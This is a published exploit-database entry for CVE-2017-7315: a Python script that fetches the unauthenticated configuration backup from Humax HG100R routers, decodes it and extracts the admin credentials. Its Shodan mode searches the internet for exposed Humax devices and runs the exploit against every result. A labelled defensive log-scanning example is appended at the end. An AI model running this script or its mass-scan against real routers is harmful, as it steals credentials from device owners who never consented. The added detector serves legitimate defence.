Humax HG100R 2.0.6 - Backup File Download
Source: vfocus.net Author: gambler Published: 2017-07-03
# coding: utf-8
 
# Exploit Title: Humax Backup file download
# Date: 29/06/2017
# Exploit Author: gambler
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-7315
 
import sys
import base64
import shodan
import requests
import subprocess
 
def banner():
    print '''
 ██░ ██  █    ██  ███▄ ▄███▓ ▄▄▄      ▒██   ██▒
▓██░ ██▒ ██  ▓██▒▓██▒▀█▀ ██▒▒████▄    ▒▒ █ █ ▒░
▒██▀▀██░▓██  ▒██░▓██    ▓██░▒██  ▀█▄  ░░  █   ░
░▓█ ░██ ▓▓█  ░██░▒██    ▒██ ░██▄▄▄▄██  ░ █ █ ▒
░▓█▒░██▓▒▒█████▓ ▒██▒   ░██▒ ▓█   ▓██▒▒██▒ ▒██▒
 ▒ ░░▒░▒░▒▓▒ ▒ ▒ ░ ▒░   ░  ░ ▒▒   ▓▒█░▒▒ ░ ░▓ ░
 ▒ ░▒░ ░░░▒░ ░ ░ ░  ░      ░  ▒   ▒▒ ░░░   ░▒ ░
 ░  ░░ ░ ░░░ ░ ░ ░      ░     ░   ▒    ░    ░
 ░  ░  ░   ░            ░         ░  ░ ░    ░
    '''
    print 'Description: Humax HG100R backup file download'
    print 'Software Version: VER 2.0.6'
    print 'SDK Version: 5.7.1mp1'
    print 'IPv6 Stack Version: 1.2.2'
    print 'Author: Gambler'
    print 'Vulnerability founded: 14/03/2016'
    print 'CVE: waiting'
    print
 
def xplHelp():
    print 'Exploit syntax error, Example:'
    print 'python xpl.py http://192.168.0.1'
 
def exploit(server):
    path = '/view/basic/GatewaySettings.bin'
    if not server.startswith('http'):
        server = 'http://%s' % server
    if server.endswith('/'):
        server = server[:-1]+''
    url = '%s/%s' %(server,path)
    print '[+] - Downloading configuration file and decoding'
    try:
        r = requests.get(url, stream=True,timeout=10)
        for chunk in r.iter_content(chunk_size=1024):
            if chunk:
                rawdata = r.content
        save(rawdata)
    except:
        pass
 
def save(rawdata):
    config = base64.b64decode(rawdata).decode('ascii','ignore').replace('^@','')
    open('config.txt', 'w').write(config)
    print '[+] - Done, file saved as config.txt'
    infos = subprocess.Popen(["strings config.txt | grep -A 1 admin"], shell=True,stdout=subprocess.PIPE).communicate()[0]
    print '[+] - Credentials found'
    print infos
 
def shodanSearch():
    SHODAN_API_KEY = "SHODAN_API_KEY"
    api = shodan.Shodan(SHODAN_API_KEY)
    try:
            results = api.search('Copyright © 2014 HUMAX Co., Ltd. All rights reserved.')
            print 'Results found: %s' % results['total']
            for result in results['matches']:
                    router = 'http://%s:%s' % (result['ip_str'],result['port'])
                    print router
                    exploit(router)
    except shodan.APIError, e:
            print 'Error: %s' % e
 
 
if __name__ == '__main__':
 
    if len(sys.argv) < 2:
        xplHelp()
        sys.exit()
    banner()
    if sys.argv[1] == 'shodan':
        shodanSearch()
    else:
        exploit(sys.argv[1])
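
Detection-side companion to the script above, added here as an example and not part of the original exploit: it scans HTTP logs for requests to `/view/basic/GatewaySettings.bin`, normalizing the URI first because the script builds its URL with `'%s/%s'` and so sends a path that starts with `//`. The tab-separated log format, the function names and the sample lines are assumptions constructed for illustration.

```python
# Added example (not from the original script): flag backup-file requests in HTTP logs.
# Assumed, constructed log format: ts, src, dst, method, uri, status, bytes (tab-separated).
import posixpath
from urllib.parse import unquote

# Path requested by the script above, lowercased for comparison (case-folding is
# an assumption that errs toward over-matching).
BACKUP_PATH = "/view/basic/gatewaysettings.bin"

SAMPLE_LOG = [  # constructed lines using documentation address ranges
    "2017-07-03T10:00:01Z\t203.0.113.7\t198.51.100.20\tGET\t//view/basic/GatewaySettings.bin\t200\t20480",
    "2017-07-03T10:00:05Z\t203.0.113.7\t198.51.100.21\tGET\t/view/basic/%47atewaySettings.bin\t401\t0",
    "2017-07-03T10:01:00Z\t192.168.0.10\t192.168.0.1\tGET\t/index.html\t200\t512",
    "2017-07-03T10:02:00Z\t192.168.0.10\t192.168.0.1\tGET\t/view/basic/GatewaySettings.bin?x=1\t200\t20480",
]

def normalize(uri):
    """Drop the query, percent-decode, collapse '//' and '/../', lowercase."""
    # Split the query by hand: urlsplit() would read a leading '//view' as a host.
    path = unquote(uri.split("?", 1)[0])
    # normpath keeps exactly two leading slashes, so strip them before joining.
    return posixpath.normpath("/" + path.lstrip("/")).lower()

def find_backup_requests(lines):
    """Return one dict per request for the backup file; 'served' marks a 200 with a body."""
    hits = []
    for line in lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) != 7:
            continue  # skip malformed lines
        ts, src, dst, _method, uri, status, size = fields
        if normalize(uri) != BACKUP_PATH:
            continue
        served = status == "200" and size.isdigit() and int(size) > 0
        hits.append({"ts": ts, "src": src, "dst": dst, "served": served})
    return hits

if __name__ == "__main__":
    for hit in find_backup_requests(SAMPLE_LOG):
        state = "SERVED" if hit["served"] else "refused"
        print("%s %s -> %s backup file %s" % (hit["ts"], hit["src"], hit["dst"], state))
```

A hit with `served` set means the device returned the file, so the admin credentials stored in that device's configuration should be treated as exposed.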
 